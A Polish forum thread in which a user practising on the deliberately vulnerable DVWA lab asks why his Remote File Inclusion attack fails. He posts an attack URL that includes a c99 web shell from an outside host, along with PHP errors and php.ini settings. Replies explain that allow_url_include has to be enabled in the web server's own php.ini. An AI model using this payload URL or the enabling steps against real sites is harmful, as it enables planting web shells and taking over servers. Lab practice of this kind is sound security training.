Remote File Include , problem.

[bagsiu]

Witam.
Mam problem z bugiem RFI.
Atak ćwicze lokalnie na stronie podatnej na ataki (DVWA).
Po dołączeniu do Url'a linka do shella(htttp://localhost/dvwa/vulnerabilities/fi/?page=http://c99shell.hut2.ru/c99.txt?) wywala takie errory :

Warning: include() [function.include]: ht tp:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35

Warning: include(http://c99shell.hut2.ru/c99.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35

Warning: include() [function.include]: Failed opening 'http://c99shell.hut2.ru/c99.txt' for inclusion (include_path='.;\xampp\php\PEAR;../../external/phpids/0.6/lib/') in C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php on line 35

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 243

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 244

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php:35) in C:\xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php on line 245

w pliku php.ini mam tak ustawione :

; This file attempts to overwrite the original php.ini file. Doesnt always work.

magic_quotes_gpc = Off
allow_url_fopen = on
allow_url_include = Off

A mój serwer lokalny to xampp.

Z góry dzięki za pomoc.

 

[widmo17]

(...) by allow_url_include=0 in (...)

allow_url_include = Off

`Myśl myśl myśl` - Kubuś Puchatek

 

[bagsiu]

Gdy zmienię `małe co nieco`(allow_url_include) na On również nie działa. ;]
Również Kubuś puchatek

Gdy restartuje serwer, dalej nic :]

Konfiguracje zmieniam w pliku php.ini w DVWA nie w XAMPP. Może to być tego powodem ?

 

[abramakabra]

Konfiguracje zmieniam w pliku php.ini w DVWA nie w XAMPP. Może to być tego powodem ?

Tak, tak musi być ustawione w pliku php.ini twojego serwera WWW.

 

[bagsiu]

Dzięki, można zamknąc

 

[widmo17]

Również Kubuś puchatek

Plus dla Ciebie :ddd